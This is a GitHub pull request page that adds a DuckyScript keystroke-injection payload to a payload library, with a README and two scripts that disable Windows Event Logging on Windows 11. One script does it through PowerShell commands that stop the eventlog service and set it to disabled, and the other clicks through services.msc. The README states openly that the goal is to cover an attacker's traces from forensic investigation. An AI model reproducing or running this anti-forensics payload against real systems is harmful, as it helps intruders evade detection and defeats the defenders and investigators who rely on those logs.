Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Disable windows event logging #235

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Disable windows event logging #235

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
37 changes: 37 additions & 0 deletions payloads/library/execution/disable_windows_event_logging/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@

# Disable Windows Event Logging

A script used to disable all Windows event logging on Windows 11.

**Category**: Execution

## Description

Event logging can be used as a tool in forensics to determine what an attack entailed.
In order to cover your traces, Windows Event Logging can be disabled.
These scripts demonstrate two approaches;
- CLI based
- UI based

While the CLI based approach is more concise, requires less interaction (and therefore has fewer pitfalls) and faster, some might prefer
the UI based approach for demonstration purposes as it allows watching the attack play out.

The CLI based approach starts an Powershell Window with administrator rights and executes two commands.
The UI based approach clicks itself through the setting panes until it reaches the right place.


The CLI script assumes that the currently logged in user has admin rights, if this is not the case, the admin password has to be substituted into the payload at the indicated line.
If the UI script is used, the delay speeds may be adjusted to the (expected) speed of the attacked host.

## Getting Started

### Dependencies

* Windows 11 with Powershell
* Windows Admin Permissions

### Settings

* Set the password for non default use (current user does not have admin rights)
* Set delay times to your requirement

39 changes: 39 additions & 0 deletions ...oads/library/execution/disable_windows_event_logging/disable_windows_event_logging_UI.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
DELAY 200
GUI r
DELAY 2000
STRINGLN services.msc
DELAY 4000
TAB
DELAY 2000
STRING Windows Event Log
DELAY 2000
ENTER
DELAY 1000
TAB
DELAY 2000
STRING m
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 6000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 500
16 changes: 16 additions & 0 deletions ...ads/library/execution/disable_windows_event_logging/disable_windows_event_logging_cli.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
DUCKY_LANG DE_CH
DELAY 50
GUI x
DELAY 100
STRINGLN a
DELAY 600
REM replace the following line with the admin password if necessary
LEFTARROW
DELAY 50
ENTER
DELAY 2000
STRINGLN Stop-Service -Name "eventlog"
DELAY 200
STRINGLN Set-Service -Name "eventlog" -StartupType Disabled
DELAY 300
STRINGLN exit